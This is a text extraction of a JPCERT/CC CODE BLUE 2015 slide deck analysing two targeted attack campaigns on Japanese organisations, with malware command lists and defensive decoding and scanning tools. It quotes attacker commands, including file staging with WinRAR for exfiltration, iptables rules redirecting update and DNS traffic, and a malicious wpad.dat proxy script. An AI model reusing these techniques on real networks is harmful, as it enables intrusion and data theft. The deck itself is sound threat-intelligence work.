Upload
code-blue
View
642
Download
6
Embed Size (px)
Citation preview
Revealing the Attack Operations Targeting JapanJPCERT/CCShusei TomonagaYuu NakamuraCODE BLUE 2015
Copyright2015 JPCERT/CC All rights reserved.
0
Agenda1 Introduction Operation A Operation B
Copyright2015 JPCERT/CC All rights reserved.
1
Agenda2 Introduction Operation A Operation B
Copyright2015 JPCERT/CC All rights reserved.
2
Self-introduction
Analysis Center at JPCERT Coordination Center Malware analysis, Forensics investigation
3Shusei Tomonaga
Yuu Nakamura
Copyright2015 JPCERT/CC All rights reserved.
3
JPCERT Coordination CenterJapan Computer Emergency Response Team Coordination CenterEarly warning informationCSIRT establishment supportIndustrial control system securityInternational collaborationArtifact (e.g. Malware) analysis
Copyright2015 JPCERT/CC All rights reserved.
4
Targeted Attacks handled by JPCERT/CC
5From April to September 2015934
130organizations
93 organizations4 organizationsOperation AOperation B
Copyright2015 JPCERT/CC All rights reserved.Introducing 2 Types of Attack Operations6
Copyright2015 JPCERT/CC All rights reserved.
6
Agenda7 Introduction Operation A Operation B
Copyright2015 JPCERT/CC All rights reserved.
7
Attackers InfrastructureCompromised Web sitesVictim organizations (Public offices, private companies)
OverseasJapan
Targeted emailsWidespread emails
8Watering hole
Characteristics of Operation A
Copyright2015 JPCERT/CC All rights reserved.Flash Player (CVE-2015-5119CVE-2015-5122)MS14-068(Kerberos (3011780))- CVE-2014-63248
Details of Internal Intrusion Techniques9
Copyright2015 JPCERT/CC All rights reserved.
9
Details of Internal Intrusion Techniques10
Copyright2015 JPCERT/CC All rights reserved.
10
Attack Patterns11Timeline of Attack VectorDisguised IconDocument File(Exploit vulnerabilities)Drive-ByDownload2014/052015/012015/052015/07CVE-2014-7247CVE-2015-5119CVE-2015-5122Medical expense, Health insurance
In many attacks, malware are disguised with fake icons, compressed withzip or lzh and attached to emails.Attacks aiming certain targets may lead to correspondence of emails.2014/092014/112015/09
Copyright2015 JPCERT/CC All rights reserved.
11
Details of Internal Intrusion Techniques12
Copyright2015 JPCERT/CC All rights reserved.Investigation of Compromised Environment13Uses Legitimate tools provided by MS
Copyright2015 JPCERT/CC All rights reserved.
13
Example of Using dsquery14
Used in some cases targeting specific individuals
Copyright2015 JPCERT/CC All rights reserved.
14
Collecting Email Account InformationUses free tools (Similar to NirSoft Mail PassView)Attempts to receive emails from outsideMay lead to new attack emails (correspondence of emails) Infection spreading from organization to organization
15
Copyright2015 JPCERT/CC All rights reserved.
15
Collecting Classified / Personal Information16
Copyright2015 JPCERT/CC All rights reserved.
16
Search Network Drive (1)> net useNew connections will be remembered.
Status Local Remote Network-------------------------------------------------------------------------------OK T:\\FILESV01\SECRET Microsoft Windows NetworkOK U:\\FILESV02\SECRET Microsoft Windows Network> wmic logicaldisk get caption,providername,drivetype,volumenameCaption DriveType ProviderName VolumeNameC: 3OSD: 3 VolumeT: 4 \\FILESV01\SECRET VolumeU: 4 \\FILESV01\SECRET Volumenet use commandwmic command
17DriveType = 4 Network Drive
Copyright2015 JPCERT/CC All rights reserved.Search Network Drive (2)> netstat an
TCP 192.168.xx.xx:49217 192.168.yy.yy:445 ESTABLISHED
> nbtstat -a 192.168.yy.yyName Type Status---------------------------------------------FILESV01 UNIQUE RegisteredCombination of netstat Command & nbtstat CommandPort 445 is set as the key to search the access point of file sharing service
18
Copyright2015 JPCERT/CC All rights reserved.
18
Search Targeted Data> dir c:\users\hoge\*.doc* /s /o-d
c:\users\hoge\AppData\Local\Temp Directory
2014/07/29 10:19 28,672 20140820.doc1 File 28,672 bytes
c:\users\hoge\Important Information Directory
2015/08/29 10:03 1,214 Design Document.doc> dir \\FILESV01\SECRET
\\FILESV\SECRET Directory
2014/07/11 09:16 [DIR] Management of Partner Companies2014/09/04 11:49 [DIR] Management of Intellectual Property2014/08/01 09:27 [DIR] Location information19dir commandNot only searches network drive but also compromised computers/s : Displayed recursively/o-d : Sorted by date
Copyright2015 JPCERT/CC All rights reserved.
19
Compress, Download, Delete Evidence > winrar.exe a r ed v300m ta20140101 %TEMP%\a.rar \\FILESV01\SECRET\Management of Intellectual Property -n*.ppt* -n*.doc* -n*.xls* -n*.jtd
Adding \\FILESV01\SECRET\Management of Intellectual Property\Committee List(2015.05.01).docx OKAdding \\FILESV01\SECRET\Management of Intellectual Property\Framework.ppt OKAdding \\FILESV01\SECRET\Management of Intellectual Property\Application List.xlsx OKAdding \\FILESV01\SECRET\Management of Intellectual Property\Design Document.jtd OK20Compressed with RARRAR files are sent to C&C servers and deleted
Documents are compressed per folderz
Copyright2015 JPCERT/CC All rights reserved.Details of Internal Intrusion Techniques21
Copyright2015 JPCERT/CC All rights reserved.Methods Used to Spread Infection22
Copyright2015 JPCERT/CC All rights reserved.
22
Exploiting Vulnerabilities (MS14-068 + MS14-058) 23
DomainControllerPC-A
PC-B
1. Escalate privilege (MS14-058) and dump users password with mimikatz
2. Exploit MS14-068 vulnerability and gain Domain Admin privileges3. Upload mimikatz to DC and dump admins passwords4. Copy malware to PC-B5. Register a task in order to execute malware6. Malware executes according to the task
Copyright2015 JPCERT/CC All rights reserved.
23
Investigating SYSVOL Scripts24
Attackers Infrastructure
C2 Server3. Search admins passwordPC-A
PC-B
6. Malware executes according to the task
2. Download1. Download logon script, compress and archive
DomainController5. Register a task in order to execute malware 4. Copy malware to PC-B
Copyright2015 JPCERT/CC All rights reserved.
24
Password List-based Attack25
PC-A
PC-B
4. Register a task 3. Copy malware
1. Get users list of Domain Admins5. ExecuteDomainController2. Attempts logon with logon.exe
Copyright2015 JPCERT/CC All rights reserved.
25
Exploiting Built-in Administrator Password26
PC-A
PC-B
3. Copy malware
1. Escalate privilege (UAC bypass) and dump users password5. Execute4. Register a task
net use \\PC-B\IPC$ [password] /u:Administrator2. Pass the hash or net use
Copyright2015 JPCERT/CC All rights reserved.
26
Setting Malware in File Servers27
PC-A
PC-B
1. Replace the existing file with malware disguised with fake icons2. Execute malware in file serversFile Server
Copyright2015 JPCERT/CC All rights reserved.
27
Exploiting WPAD
Turned on by default Get automatic configuration script from eitherURL specified by DHCP server, orhttp://wpad/wpad.dat
28
WPAD (Web Proxy Auto-Discovery)
Copyright2015 JPCERT/CC All rights reserved.
28
Exploiting WPAD (Step 1: NetBIOS Spoofing)29
PC-A
PC-B
2. Name query response (I am WPAD)1. Broadcast: Name query NB WPADwpad.exe
Copyright2015 JPCERT/CC All rights reserved.Exploiting WPAD (Step 2: Fake WPAD Server)30
PC-A
PC-B
4. Responsewpad.exe
function FindProxyForURL(url, host) {
if (myIpAddress() != [PC-A addr]) {return PROXY wpad:8888;DIRECT;}return DIRECT;}wpad.dat (automatic configuration script)3. Request http://wpad/wpad.dat
Copyright2015 JPCERT/CC All rights reserved.Exploiting WPAD (Step 3: Man in the Middle Proxy)31
PC-A
PC-B
5. Embed iframe in attackers Web sitewpad.exe
6. Drive-by download attack
Attackers InfrastructureAttackers Web Site
Web site
Copyright2015 JPCERT/CC All rights reserved.
31
Summary: Methods of Spreading InfectionMethodADPrivilege EscalationNoteMS14-068NecessaryUnnecessary /Necessary for password dumpRisk exists when DC is unpatchedSYSVOL SearchNecessaryUnnecessaryBrute Force Attack (Password List Attack)NecessaryUnnecessaryRisk exists when the password is weakAbusing Built-in AdministratorUnnecessaryNecessaryPresumes that the password is the sameExploiting File ServersUnnecessaryUnnecessaryRisk exists when the file is disguised to one that many users openExploiting WPADUnnecessaryUnnecessarySituations are limited
32
Copyright2015 JPCERT/CC All rights reserved.
32
Details of tools and malware
33
Copyright2015 JPCERT/CC All rights reserved.Characteristics of Malware34MalwareOverviewFile formatForm of attackEmdivi (t17)HTTP BOTEXEIntrudeToolsPassword dump, etc.EXE, etc.usp10jpgDownload (low-frequency communication)DLL, dataLateral MovementEmdivi (t19, t20)HTTP BOT (highly sophisticated than t17)EXEBeginXRemote shell toolEXEGStatusHTTP BOT (low-frequency communication)EXE,DLLConceal?
Reference : [Ayaka Funakoshi. A study on malware characteristics and its effects observed in targeted attacks. MWS, 2015]Different types of malware reside depending on the phase and scale of damage of the attack
Copyright2015 JPCERT/CC All rights reserved.
34
Tools35TypeOverviewFilenamePassword dumpPass-the-hashQuarks PwDumpqp.exe, qd.exe, QDump.exe, etc.MimikatzLitegp.exeWindows credentials Editorwce.exe, ww.exeMimikatzmz.exe, mimikatz.exe, mimikatz.rar(sekurlsa.dll)Vulnerability exploitationMS14-068 (CVE-2014-6324)ms14-068.exems14-068.tar.gzMS14-058 (Privilege escalation)(CVE-2014-4113)4113.exeUAC bypassUAC bypass toolmsdart.exe, puac.exe, etc.Packet transmitHtran, proxy adaptive Htranhtproxy.exe, etc.Mail account theftSimilar to NirSoft Mail PassViewCallMail.exe, outl.exe , etc.UtilityAttempt logon based on listlogon.exeWinRAR archiveryrar.exe, rar,exe, etc.Highly sophisticated dir commanddirasd.exe, etc.Change timestamptimestomp.exe
Copyright2015 JPCERT/CC All rights reserved.Emdivi (t17)
Repeatedly upgraded the version in the past year and implemented new commands
36CommandDate of ImplementationDOABORTDOWNBGGETFILELOADDLLSETCMDSUSPENDUPLOADVERSIONGOTOMay 2015CLEARLOGSAugust 2015
HTTP BOT with basic functions
Copyright2015 JPCERT/CC All rights reserved.
36
Emdivi (t20)
The number of implemented commands have increased and decreased in the past year. 18-41 (based on JPCERT/CCs study)
In some cases, the targeted organizations proxy server address is hard-coded.
May only run on specific computers (encryption of data by computer SID)
37Highly Sophisticated Emdivi
Copyright2015 JPCERT/CC All rights reserved.
37
usp10jpg
Communication performed once a dayAble to specify the day of week of communicationTend to be set to computers that are not infected with Emdivi (secondary infection)DLL Preloading Attack
38Download (low-frequency communication)
dwmapi.dll, etc.
***.DAT
Application
Exploit specific DLL Search Order and load malicious DLL
Read data and execute
Copyright2015 JPCERT/CC All rights reserved.
38
Difficulty to detect Usp10jpg39
Attackers Infrastructure
Computer Infected with Emdivi
May be left undetected due to low-frequency communication
usp10jpgEasy to detect due to high-frequency communication
Copyright2015 JPCERT/CC All rights reserved.BeginX
BeginX Server Listens to specific ports and waits for commands Both UDP and TCP versions available
BeginX Client Client which sends commands to BeginX Server Controlled via Emdivi40
Remote Shell Tool
Copyright2015 JPCERT/CC All rights reserved.
40
Image of Using BeginX41
Attackers Infrastructure
Segment (unable to connect to Internet)
Computer Infected with Emdivi
BeginXServer
BeginXClient
Unable to control by Emdivi infection
Able to control via BeginX
Emdivi
Copyright2015 JPCERT/CC All rights reserved.
41
42
Not found in many organizations, but...
Bot Function Get drive information Execute arbitrary shell command Process list Screen related functions
HTTP BOT different from EmdiviGStatus
Copyright2015 JPCERT/CC All rights reserved.GStatus Web Panel (Admin Screen)43
Copyright2015 JPCERT/CC All rights reserved.Analysis ToolS
44emdivi_string_decryptor.py
Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py45
Copyright2015 JPCERT/CC All rights reserved.
45
emdivi_string_decryptor.py
46Emdivi encoded strings
Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py47Difference depending on version stringVer 17Ver 19 or 20Ver 20EncryptXxTEA encryptXxTEA decryptAES decryptDecryptXxTEA decryptXxTEA encryptAES encryptKeyMD5( MD5(base64(ver)) + MD5(key_string))Scanf( "%x", Inc_Add( ver17_key ))Inc_Add( ver17_key)
Copyright2015 JPCERT/CC All rights reserved.
47
emdivi_string_decryptor.py
48
Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py
49
Copyright2015 JPCERT/CC All rights reserved.Demo
50
Copyright2015 JPCERT/CC All rights reserved.Agenda51 Introduction Operation A Operation B
Copyright2015 JPCERT/CC All rights reserved.
51
Attack Techniques52
Copyright2015 JPCERT/CC All rights reserved.Attack Techniques53
Copyright2015 JPCERT/CC All rights reserved.
Drive-by Download (Watering Hole) Attack54
Targeted Organization
Japanese Web server
1. Access to Web site
. Redirect0. Deface Web site
. Download malware. Malware Infection
Attackers Server
Copyright2015 JPCERT/CC All rights reserved.
54
Access Control55.htaccessTarget nameIP address
Copyright2015 JPCERT/CC All rights reserved.560-day Exploits
Copyright2015 JPCERT/CC All rights reserved.Attack Techniques57
Copyright2015 JPCERT/CC All rights reserved.
Update Hijacking58
Targeted Organization
Update Server
1. Request to update
0. Alter updated information
. Download malware. Malware Infection
Fake Update Server
. Fake update Information
. Request to download
Method used to alter updated information
Copyright2015 JPCERT/CC All rights reserved.
58
Another Update Hijacking Pattern
Targeted Organization
Update ServerFake Update Server
Method used without changing update server's file59
0. Change iptables
1. Software Update
Copyright2015 JPCERT/CC All rights reserved.
59
Another Update Hijacking PatternMethod used without changing update server's fileiptables -t nat -A PREROUTING -i eth0 -s aa.bb.cc.dd -p tcp --dport 80 -j DNAT --to-destination ww.xx.yy.zz:5360TCP 80 is forwarded by iptables.
Copyright2015 JPCERT/CC All rights reserved.
60
Attack Techniques61
Copyright2015 JPCERT/CC All rights reserved.
Domain Name Hijacking
62
Targeted OrganizationRegistrarRegistry.comDNS Server
Attackers InfrastructureDNSServerWebServerDNSServerWebServerLegitimate Server0. Change registration information
1.DNS query2.DNS query
4.Web access
Copyright2015 JPCERT/CC All rights reserved.
62
Details of malware
63
Copyright2015 JPCERT/CC All rights reserved.Domain Name Hijackingiptables -t nat -A PREROUTING -p udp --dport 53 -m string --from 30 --to 34 --hex-string "|03|AAA" --algo bm -j DNAT --to-destination aa.bb.cc.dd:54
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to ww.xx.yy.zz:5364Routing of only specific DNS queries by using iptablesAAA.example.com
Copyright2015 JPCERT/CC All rights reserved.
64
Characteristics of Malware65
Uses a different malware before and after the intrusion
Some malware run in memory only
Embedding target organization's internal information
Uses code signing certificate in some cases
Copyright2015 JPCERT/CC All rights reserved.
65
Characteristics of Malware66Intrusion
Concealing
Copyright2015 JPCERT/CC All rights reserved.
66
Malware (Intrusion)67commandinfo0x184004Execute remote shell0x184008Run remote shell command0x18400cCreate file0x184010Load file0x184014Get drive information0x184018Create directory0x18401cSearch file0x184020Delete file
commandinfo0x184024Move file0x184028Process list0x18402cTerminate process0x184030Sleep0x184034Install command0x184038Set Sleep Time0x18403cTerminate
HTTP bot with basic functionsCommand List
Copyright2015 JPCERT/CC All rights reserved.
67
IP Address Acquisition Algorithm68Get C2 IP address from Web pageDecode
start: @MICR0S0FTend: C0RP0RATI0Nstart: lOve yOu 4 eveRend: Reve 4 uOy evOl
Copyright2015 JPCERT/CC All rights reserved.Malware (Intrusion)69Plug-in-based malwarecommand numberinfo0Send data to server1Set TickCount3Plug-in registration4Allocate Plug-in settings area5Set Plug-in settings area6Create/Execute plug-in7Terminate plug-in8Create configuration file9-
Command list
Copyright2015 JPCERT/CC All rights reserved.
69
Malware Running in Memory Only70CVE-2013-3918 with McRAT
ROP
skipShellcodeMalware
Copyright2015 JPCERT/CC All rights reserved.
70
Malware Running in Memory Only71CVE-2013-3918 with McRAT
Executes rundll32.exe and injects code
McRAT's data below Shellcode is injected
Not saved as a file
Copyright2015 JPCERT/CC All rights reserved.
71
Malware (Intrusion)72Simple HTTP bot with limited functionscommandinfo downonlyDownload file downexecDownload and Execute file -Run remote shell command
Command list
Copyright2015 JPCERT/CC All rights reserved.
72
Preshin Controller73
PHP-based Controller
Copyright2015 JPCERT/CC All rights reserved.Preshin Controller74Example of command execution
Copyright2015 JPCERT/CC All rights reserved.
74
Malware (Intrusion)75HTTP bot with basic functionscommandinfo1Get disk information2File list3Open file4Upload file5Create file7Load file
commandinfo8-9Delete file10Delete file/folder11Upload file12Create folder13Move file
Command list
Copyright2015 JPCERT/CC All rights reserved.
75
Malware (Concealing)76Malware with Rootkit functionscommandinfo fileFile related operation informationSend configuration information proxyEnable Proxy settings connectConnect to Hikit proxy shellRun remote shell command socks5Enable Proxy settings (socks5) exitTerminate
Command list
Copyright2015 JPCERT/CC All rights reserved.
76
Hikit Configuration Information77Hikit has proxy information of the internal network
Proxy info
IDTarget name
Rootkit setting
Copyright2015 JPCERT/CC All rights reserved.
77
Malware (Concealing)78Malware recently often usedcommandinfo cmd4Service/Process related operation cmd5Run remote shell command cmd6Connect to Derusbi proxy cmd7File operation cmd8Terminate cmd9Create/Delete file
Command list
Copyright2015 JPCERT/CC All rights reserved.
78
Derusbi Configuration Information79Derusbi has proxy information of the internal network
Proxy info
ID
Copyright2015 JPCERT/CC All rights reserved.
79
Code Signing Certificate80IdentityTypeCountry System IntegratorexeJapan Software VendorexeJapan Software VendorexeKorea AutomakerexeKorea Heavy IndustryjarKorea Software VendorexeKorea Electronics IndustryjarKorea Software VendorexeKorea
Copyright2015 JPCERT/CC All rights reserved.
Infrastructure Used by Attackers
81
Targeted Organization
Attackers ServerWeb Server
Overseas ServerBackdoorJapan
C2 Server
iptables
Copyright2015 JPCERT/CC All rights reserved.
81
Linux Backdoor82mod_rootme source
KeywordRoronoa
Copyright2015 JPCERT/CC All rights reserved.
82
Linux Backdoor83FunctionMyNetstatCreateShellMymkdirPortTunnelGetGetFileSourceMymkfilePortTunnel_RemoteCloseMyPsMyrmfilePortTunnel_ShowKillByPidMyrmdirCreatePortTunnelNewConnectToListDirPortForwardStartPutFilemy_rebootPortForward_ShowPutFileDestShowHidePortForward_CloseShellServerSwitchHide
Copyright2015 JPCERT/CC All rights reserved.Analysis ToolS
84apt17scan.py
Copyright2015 JPCERT/CC All rights reserved.apt17scan.py85
Copyright2015 JPCERT/CC All rights reserved.
85
apt17scan.py86Scan with YARASearch configuration data addressParse configuration dataDump configuration
Copyright2015 JPCERT/CC All rights reserved.apt17scan.py87apt17scan Detecting Malware
Copyright2015 JPCERT/CC All rights reserved.apt17scan.py88derusbiconfig Dump configuration information for Derusbi
Copyright2015 JPCERT/CC All rights reserved.apt17scan.py89hikitconfig Dump configuration information for Hikit
Copyright2015 JPCERT/CC All rights reserved.apt17scan.py90agtidconfig Dump configuration information for Agtid
Copyright2015 JPCERT/CC All rights reserved.Demo
91
Copyright2015 JPCERT/CC All rights reserved.How to Download92https://github.com/JPCERTCC
Copyright2015 JPCERT/CC All rights reserved.Thank [email protected]://www.jpcert.or.jp
Incident [email protected]://www.jpcert.or.jp/form/
Copyright2015 JPCERT/CC All rights reserved.
93